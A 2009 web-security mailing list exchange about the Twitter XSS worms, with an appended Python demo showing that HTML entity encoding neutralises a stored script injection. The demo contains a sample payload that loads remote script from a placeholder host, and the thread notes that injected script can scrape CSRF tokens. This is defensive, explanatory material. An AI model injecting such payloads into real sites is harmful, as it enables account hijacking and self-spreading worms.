[WEB SECURITY] Twitter XSS worms

Chris Eng ceng at Veracode.com
Mon Apr 13 16:54:56 EDT 2009


From glancing at the .js code, the XSS looks like a textbook case, the
type that would be mitigated by the "best practice" solution, HTML
entity encoding.  The attack string doesn't appear to use any unusual
transformations to evade filters.

Twitter uses a nonce called authenticity_token to protect against CSRF,
but that's irrelevant since the .js can just scrape the token off the
page.



> -----Original Message-----
> From: Steven M. Christey [mailto:coley at linus.mitre.org]
> Sent: Monday, April 13, 2009 3:59 PM
> To: Hoffman, Billy; Chris Eng
> Cc: robert at webappsec.org; websecurity at webappsec.org
> Subject: RE: [WEB SECURITY] Twitter XSS worms
> 
> 
> For those who speak fluent XSS, how obscure was the attack vector and the
> attack technique? Actually, what I'm really wondering is, would "best
> practices" or even "average practices" have prevented this attack from
> succeeding?  Either for the XSS or the CSRF angles.  Is
> Ajax-as-an-XSS-attack-vector still novel?
> 
> - Steve
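As an added illustration of the two points made in this message (it is not code from the thread or from Twitter), the following Python snippet renders a constructed profile field into a constructed page template, once verbatim and once after HTML entity encoding, and checks whether an active script tag survives. The template, the `location` field name, the placeholder payload host `example.invalid` and the sample token value are all assumptions made for the example. It also shows that the `authenticity_token` nonce is present in both renderings, which is the point of the second paragraph: the nonce addresses CSRF and does nothing about script that already runs in the page.

```python
"""Added example: HTML entity encoding as the mitigation for a textbook stored XSS.

Nothing here is Twitter's code or the worm's code; the template, field names and
the sample payload are constructed for illustration only.
"""
import html
import re

# Constructed sample input: a textbook script injection in a user-controlled
# profile field. The host is a reserved placeholder, not a real site.
MALICIOUS_LOCATION = '<script src="http://example.invalid/worm.js"></script>'
SAMPLE_TOKEN = "constructed-nonce-0123"

# Constructed page fragment: a CSRF nonce in a hidden field plus the profile
# field rendered both in text context and in an attribute context.
TEMPLATE = (
    '<form action="/update" method="post">'
    '<input type="hidden" name="authenticity_token" value="{token}">'
    '<input type="text" name="location" value="{location}">'
    '</form>'
    '<div class="location">{location}</div>'
)

_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
_TOKEN_FIELD = re.compile(r'name="authenticity_token" value="([^"]*)"')


def encode_for_html(value: str) -> str:
    """Entity-encode the characters that let user data change HTML structure.

    quote=True also encodes " and ' so the value is safe inside a quoted
    attribute as well as in element text.
    """
    return html.escape(value, quote=True)


def render_unsafe(location: str, token: str = SAMPLE_TOKEN) -> str:
    """Vulnerable rendering: user input is interpolated verbatim into the page."""
    return TEMPLATE.format(token=token, location=location)


def render_safe(location: str, token: str = SAMPLE_TOKEN) -> str:
    """Hardened rendering: the same template, with the user value entity-encoded."""
    return TEMPLATE.format(token=token, location=encode_for_html(location))


def contains_active_script(page: str) -> bool:
    """Output check: does the rendered page still contain a live <script> tag?

    An entity-encoded payload appears as '&lt;script ...' and does not match.
    """
    return bool(_SCRIPT_TAG.search(page))


def csrf_token_in_page(page: str) -> str:
    """Return the nonce as it appears in the markup (empty string if absent).

    Used below to show the token is emitted identically in both renderings:
    encoding the user field neither removes it nor is the nonce a defence
    against script executing in the page.
    """
    m = _TOKEN_FIELD.search(page)
    return m.group(1) if m else ""


if __name__ == "__main__":
    unsafe = render_unsafe(MALICIOUS_LOCATION)
    safe = render_safe(MALICIOUS_LOCATION)
    print("unsafe rendering has live script tag:", contains_active_script(unsafe))
    print("safe rendering has live script tag:  ", contains_active_script(safe))
    print("nonce present in both:", csrf_token_in_page(unsafe) == csrf_token_in_page(safe))
    print("encoded field:", encode_for_html(MALICIOUS_LOCATION))
```

The `encode_for_html` step is the "best practice" the message refers to: it is applied at output time, in the context where the value is written into the page, rather than by trying to recognise and strip attack strings on input, which is exactly the filter-evasion game the message notes this attack did not even need to play.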
